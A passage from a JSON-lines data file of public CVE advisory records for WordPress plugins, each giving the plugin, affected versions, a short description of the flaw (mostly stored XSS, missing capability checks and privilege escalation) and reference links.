www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7363b5de-db30-4b35-b701-5c8f2835ec6c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7363b5de-db30-4b35-b701-5c8f2835ec6c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4474","slug":"frontend-dashboard","description":"The Frontend Dashboard plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the fed_admin_setting_form_function() function in versions 1.0 to 2.2.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the plugin\u2019s 'register' role setting to make new user registrations default to the administrator role, leading to an elevation of privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/request\\\/admin.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/request\\\/admin.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/request\\\/tabs\\\/login.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/request\\\/tabs\\\/login.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290623\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290623\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frontend-dashboard\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frontend-dashboard\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb61159a-e501-4c55-a384-b6049e0f0bc8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb61159a-e501-4c55-a384-b6049e0f0bc8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6258","slug":"wp-soundsystem","versionImpact":"3.4.2","description":"The WP SoundSystem plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpsstm-track shortcode in all versions up to, and including, 3.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-soundsystem\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-soundsystem\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f027626a-471c-48aa-add6-7597254dcfa9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f027626a-471c-48aa-add6-7597254dcfa9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7966","slug":"get-youtube-subs","versionImpact":"3.5","description":"The Get Youtube Subs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018channel', 'layout', and 'subs_count\u2019 parameters in all versions up to, and including, 3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-youtube-subs\\\/trunk\\\/includes\\\/youtubesubs-class.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-youtube-subs\\\/trunk\\\/includes\\\/youtubesubs-class.php#L142\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/get-youtube-subs\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/get-youtube-subs\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a25728c-3d98-414b-bad0-2c05eb1f4ca2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a25728c-3d98-414b-bad0-2c05eb1f4ca2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0365","slug":"react-webcam","versionImpact":"1.2.0","description":"The React Webcam WordPress plugin through 1.2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d268d7a3-82fd-4444-bc0e-27c7cc279b5a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d268d7a3-82fd-4444-bc0e-27c7cc279b5a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2083","slug":"essential-blocks","versionImpact":"4.0.6","description":"The Essential Blocks plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the save function in versions up to, and including, 4.0.6. This makes it possible for subscriber-level attackers to save plugin settings. While a nonce check is present, it is only executed when a nonce is provided. Not providing a nonce results in the nonce verification to be skipped. There is no capability check.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8bf0933-1c97-4374-b323-c55b91fe4d27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8bf0933-1c97-4374-b323-c55b91fe4d27?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1368","slug":"wp-page-duplicator","versionImpact":"0.1.1","description":"The Page Duplicator plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the duplicate_dat_page() function in all versions up to, and including, 0.1.1. This makes it possible for unauthenticated attackers to duplicate arbitrary posts and pages.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcc10e91-4810-4a0d-919c-de3e87137f76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcc10e91-4810-4a0d-919c-de3e87137f76?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-page-duplicator\\\/trunk\\\/page-duplicator.php#L136\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-page-duplicator\\\/trunk\\\/page-duplicator.php#L136\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2922","slug":"themesflat-addons-for-elementor","versionImpact":"2.1.1","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via widget tags in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1516280e-796e-4011-b15f-b754860ad414?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1516280e-796e-4011-b15f-b754860ad414?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themesflat-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themesflat-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9119","slug":"svg-complete","versionImpact":"1.0.2","description":"The SVG Complete plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f8e1495-c5e1-4bb9-92e9-b27b9b997a5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f8e1495-c5e1-4bb9-92e9-b27b9b997a5f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-complete\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-complete\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10057","slug":"rss-feed-widget","versionImpact":"2.9.9","description":"The RSS Feed Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's rfw-youtube-videos shortcode in all versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b77ea258-dced-4c36-bd0d-8977a347d1c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b77ea258-dced-4c36-bd0d-8977a347d1c9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rss-feed-widget\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rss-feed-widget\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170773\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170773\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11015","slug":"sign-in-with-google","versionImpact":"1.8.0","description":"The Sign In With Google plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.8.0. This is due to the 'authenticate_user' user function not implementing sufficient null value checks when setting the access token and user information. This makes it possible for unauthenticated attackers to log in as the first user who has signed in using Google OAuth, which could be the site administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sign-in-with-google\\\/trunk\\\/src\\\/admin\\\/class-sign-in-with-google-admin.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sign-in-with-google\\\/trunk\\\/src\\\/admin\\\/class-sign-in-with-google-admin.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afe894b0-5e91-4aa2-bbd1-1f74274701cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afe894b0-5e91-4aa2-bbd1-1f74274701cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11915","slug":"rrdevs-for-elementor","versionImpact":"1.1.0","description":"The RRAddons for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.1.0 via the Popup block due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rrdevs-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rrdevs-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f7e300f-06b5-4f59-9deb-9771bf86a204?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f7e300f-06b5-4f59-9deb-9771bf86a204?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12444","slug":"wp-dispensary","versionImpact":"4.5.0","description":"The WP Dispensary plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpd_menu' shortcode in all versions up to, and including, 4.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-dispensary\\\/trunk\\\/admin\\\/wp-dispensary-shortcodes.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-dispensary\\\/trunk\\\/admin\\\/wp-dispensary-shortcodes.php#L256\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-dispensary\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-dispensary\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13753c4d-1b51-4db2-a69e-523857a50e55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13753c4d-1b51-4db2-a69e-523857a50e55?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13579","slug":"wp-asambleas","versionImpact":"2.85.0","description":"The WP-Asambleas plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'polls_popup' shortcode in all versions up to, and including, 2.85.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-asambleas\\\/trunk\\\/modules\\\/shortcodes.php#L999\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-asambleas\\\/trunk\\\/modules\\\/shortcodes.php#L999\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ad542c9-2025-4875-bd37-f42095c058bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ad542c9-2025-4875-bd37-f42095c058bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13923","slug":"order-import-export-for-woocommerce","versionImpact":"2.6.0","description":"The Order Export & Order Import for WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.6.0 via the validate_file() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/import\\\/classes\\\/class-import-ajax.php#L175\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/order-import-export-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/order-import-export-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3283b3ff-1787-466b-9517-84bd715e4165?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3283b3ff-1787-466b-9517-84bd715e4165?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4473","slug":"frontend-dashboard","description":"The Frontend Dashboard plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the ajax_request() function in versions 1.0 to 2.2.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to control where the plugin sends outgoing emails. By pointing SMTP to their own server, attackers could capture password reset emails intended for administrators, and elevate their privileges for full site takeover.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/function-admin.php#L3055\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/function-admin.php#L3055\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/layout\\\/settings_tab\\\/email\\\/class-fed-email.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/layout\\\/settings_tab\\\/email\\\/class-fed-email.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/route\\\/class-fed-request.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/route\\\/class-fed-request.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290623\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290623\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frontend-dashboard\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frontend-dashboard\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f3a10b5-b024-4b3f-af67-b7fcb997d368?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f3a10b5-b024-4b3f-af67-b7fcb997d368?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5812","slug":"vgw-metis","versionImpact":"2.0.0","description":"The VG WORT METIS plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the gutenberg_save_post() function in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update limited post settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vgw-metis\\\/trunk\\\/classes\\\/admin.php#L422\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vgw-metis\\\/trunk\\\/classes\\\/admin.php#L422\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9edcbdc-5b01-4880-95ec-57d87ccbb472?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9edcbdc-5b01-4880-95ec-57d87ccbb472?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7959","slug":"station-pro","versionImpact":"2.4.2","description":"The Station Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width' and 'height\u2019 parameter in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/station-pro\\\/tags\\\/2.4.2\\\/core\\\/inc\\\/player\\\/class-station-player.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/station-pro\\\/tags\\\/2.4.2\\\/core\\\/inc\\\/player\\\/class-station-player.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/station-pro\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/station-pro\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4026b41-29c3-4e0a-bf75-ae4ba47edb4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4026b41-29c3-4e0a-bf75-ae4ba47edb4f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2067","slug":"bulletin-announcements","versionImpact":"3.7.0","description":"The Announcement & Notification Banner \u2013 Bulletin plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce validation on the 'bulletinwp_update_bulletin_status', 'bulletinwp_update_bulletin', 'bulletinwp_update_settings', 'bulletinwp_update_status', 'bulletinwp_export_bulletins', and 'bulletinwp_import_bulletins' functions in versions up to, and including, 3.7.0. This makes it possible for unauthenticated attackers to modify the plugin's settings, modify bulletins, create new bulletins, and more, via a forged request granted they can trick a site's user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910991\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910991\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b808450f-0ebf-4c49-a9e3-f1c1f2b1f632?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b808450f-0ebf-4c49-a9e3-f1c1f2b1f632?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulletin-announcements\\\/trunk\\\/classes\\\/class-bulletinwp-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3122","slug":"gd-mail-queue","versionImpact":"3.9.3","description":"The GD Mail Queue plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email contents in versions up to, and including, 3.9.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923988\\\/gd-mail-queue\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923988\\\/gd-mail-queue\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b668f45-c7fb-481b-bc8e-115e5b7248c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b668f45-c7fb-481b-bc8e-115e5b7248c9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4506","slug":"ldap-login-for-intranet-sites","versionImpact":"4.1.10","description":"The Active Directory Integration \/ LDAP Integration plugin for WordPress is vulnerable to LDAP Passback in versions up to, and including, 4.1.10. This is due to insufficient validation when changing the LDAP server. This makes it possible for authenticated attackers, with administrative access and above, to change the LDAP server and retrieve the credentials for the original LDAP server.","refs":"[{\"url\":\"https:\\\/\\\/medium.com\\\/%40cybertrinchera\\\/cve-2023-4506-cve-2023-4505-ldap-passback-on-miniorange-plugins-ca7328c84313\",\"name\":\"https:\\\/\\\/medium.com\\\/%40cybertrinchera\\\/cve-2023-4506-cve-2023-4505-ldap-passback-on-miniorange-plugins-ca7328c84313\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0585969d-dd08-4058-9d72-138a55a2cdf1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0585969d-dd08-4058-9d72-138a55a2cdf1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ldap-login-for-intranet-sites\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ldap-login-for-intranet-sites\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3023","slug":"announcekit","versionImpact":"2.0.9","description":"The AnnounceKit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0417e2d7-0c0a-48e1-bf18-3f5e16b1b8a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0417e2d7-0c0a-48e1-bf18-3f5e16b1b8a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/announcekit\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/announcekit\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1175","slug":"wp-recall","versionImpact":"16.26.6","description":"The WP-Recall \u2013 Registration, Profile, Commerce & More plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'delete_payment' function in all versions up to, and including, 16.26.6. This makes it possible for unauthenticated attackers to delete arbitrary payments.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b84b13a-b46c-48fc-a7a8-de32c575d576?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b84b13a-b46c-48fc-a7a8-de32c575d576?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-recall\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-recall\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
